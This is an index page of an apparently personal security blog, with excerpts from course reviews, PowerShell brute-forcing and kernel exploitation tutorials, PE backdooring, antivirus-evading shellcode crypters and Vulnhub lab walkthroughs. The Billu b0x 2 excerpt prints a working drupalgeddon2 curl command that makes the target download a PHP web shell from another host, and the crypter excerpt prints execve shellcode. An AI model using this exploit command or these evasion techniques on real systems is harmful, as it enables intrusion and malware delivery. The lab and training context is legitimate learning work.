Posts

Review of Pentester Academy - Attacking and Defending Active Directory Lab

A few months ago I didn't know what Active Directory was or why I should care about it, and I had never heard about ACL abuse and all. Although I had attended a BPAD (Breaking and Pwning Active Directory) training provided by Nullcon, I was not confident enough to go for this course exam, since my day-to-day activity involves VAPT stuff related to Web/Network/Mobile and sometimes basic malware analysis (a very basic one :p). I started doing the offshore lab and took help from some friends in understanding a few Active Directory concepts. I made many silly mistakes during the lab and learned a lot. Meanwhile I registered for the Active Directory Lab Course and got it in a discounted offer for the first 50 students of about 11k INR (1 month lab access) :). Before wasting any further time, let's dive into the review. The course - https://www.pentesteracademy.com/activedirectorylab Certification - Certified Red Team Professional The Course Content - After paying the c...

Brute Force Basic Authentication - PSP Assignment 0x1

Before we start I would like to bring your attention to this PSP course from Pentester Academy - https://www.pentesteracademy.com/course?id=21 . The course is focused on PowerShell scripting which can be used in pentesting activities. AGENDA: 1. Introduction to PowerShell 2. Basic Authentication lab setup 3. Brute-force Basic Authentication using a PowerShell script - cmdlet - IP, port and word-list should be easily configurable 1. Introduction to PowerShell - Microsoft says - PowerShell is a task-based command-line shell and scripting language built on .NET. PowerShell helps system administrators and power users rapidly automate tasks that manage operating systems (Linux, macOS, and Windows) and processes. PowerShell commands let you manage computers from the command line. PowerShell providers let you access data stores, such as the registry and certificate store, as easily as you access the file system. PowerShell inc...

Windows Kernel Exploitation - Part 0x0 [WKE P0]

Hello Readers, It's been so long since I have written any blog post, but now the time has come :p Firstly I thought of writing a series of tutorials on Active Directory Pentesting, but setting up a good AD lab will take some time, so we can learn it once the AD lab is ready ;) :) If you hate theory then you may not like this post, because I have to include it in order to start from scratch. I assume that you have some experience in binary exploitation because I won't be covering user-land exploitation. Introduction - I thought of learning the basics of kernel exploitation on Win7 in a virtual environment. This blog post is the 0th part of this series on Windows Kernel Exploitation. Please feel free to point out mistakes, send suggestions and also criticize wherever you feel like ;) Let us start! Kernel - According to Wikipedia - a kernel is a central part of an operating system which manages the operations of the computer and hardware - most ...

Backdooring PE files using code caves : OSCE/CTP Module 0x03 (OSCE Preparation)

Hello Readers, This post will cover backdooring a PE file by using code caves. There are already good tools to do this for you, e.g. Backdoor Factory and Shelter, which will do the same job and even bypass the static analysis of a few antiviruses. I will be covering the manual approach of backdooring a PE file. Let's understand some terms: [x] PE file : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. [x] Code Cave : Wikipedia says - "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code's script functions that have capacity for the injection of custom instructions. For example, if a script's memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script." [x] Shellcode : Wikipedia - ...

Toppo 1 Walkthrough - Vulnhub Machine

Hello Friends, This is my second write-up on a vuln machine, Toppo 1, made by my bro Hadi Mene. Let's get started.... After running nmap against the target machine, I found port 80 was open, so I started enumerating from there. The first thing I try for any web app based challenge is running Dirbuster ;) Found an interesting file, i.e. notes.txt. Let's check it out in the browser. Great, we got a password. It could be an SSH credential or FTP, etc. Since the FTP port is closed, let's go for SSH login. Tried ted123 and ted as the username. Luckily "ted" worked for me. So username - ted, pass - 1234ted123. Now comes the privilege escalation part. This was the easiest part since it covers the basics of privilege escalation through SUID. I checked for the binaries which had setuid enabled. setuid bit - Binaries with the setuid bit enabled are executed as if they were running under the context of the root user. That moment when you see...

Billu b0x 2 Walkthrough - Vulnhub Machine

Hello Friends, This is my first boot2root write-up, on a vuln machine made by my brother Manish Kishan Tanwar. This machine is based on the latest vulnerability in Drupal CMS. Let's get started... Since port 80 was open, I tried testing the web app. After looking at the source code, it was clear that the website was running on a CMS called Drupal. I verified the version of Drupal from changelog.txt. The Drupal version used was 8.x. Suddenly something clicked in my mind and I thought of giving the famous drupalgeddon2 exploit a try. I tried exploiting it through curl. I used the following command to download a PHP web shell - curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5 Through the PHP shell, I got...

Custom Crypter x86 - SLAE Assignment 0x7

Before we start, I would like to bring your attention to this SLAE course from securitytube which will help you learn shellcoding - http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ AGENDA: 1. Write encryption and decryption algorithm using a high level language 2. Test the encryption algorithm on shellcode 3. Verify the decryption algorithm on the encrypted shellcode I have used the C# language and made a Windows-based GUI application in order to encrypt and decrypt shellcode using the AES encryption scheme. Crypter : A crypter is a program which encrypts the shellcode (in our case) so that anti-virus evasion can be done, and has a module called a decrypter which decrypts and executes the original shellcode. I will use execve shellcode and encrypt and decrypt it using our newly made custom crypter. execve Shellcode : Extracted shellcode - "\x31\xdb\xf7\xe3\x04\x0b\x53\x53\x59\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" C# ...